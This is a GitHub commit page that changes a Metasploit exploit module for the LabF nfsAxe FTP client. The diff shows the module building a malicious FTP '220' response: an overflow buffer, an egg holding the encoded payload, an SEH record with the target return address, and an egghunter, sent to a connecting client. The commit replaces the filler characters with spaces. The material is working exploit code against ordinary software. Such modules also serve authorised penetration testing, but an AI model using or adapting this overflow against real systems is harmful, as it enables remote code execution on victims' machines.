Skip to content

Commit ff1806e

Browse files
Update labf_nfsaxe.rb
1 parent a69f275 commit ff1806e

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/windows/ftp/labf_nfsaxe.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -69,11 +69,11 @@ def on_client_connect(client)
6969
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
7070

7171
sploit = "220 \""
72-
sploit << "A"*(9833 - egg.length)
72+
sploit << "\x20"*(9833 - egg.length)
7373
sploit << egg
7474
sploit << generate_seh_record(target.ret)
7575
sploit << hunter
76-
sploit << "C"*(576 - hunter.length)
76+
sploit << "\x20"*(576 - hunter.length)
7777
sploit << "\" is current directory\r\n"
7878

7979
client.put(sploit)

0 commit comments

Comments
 (0)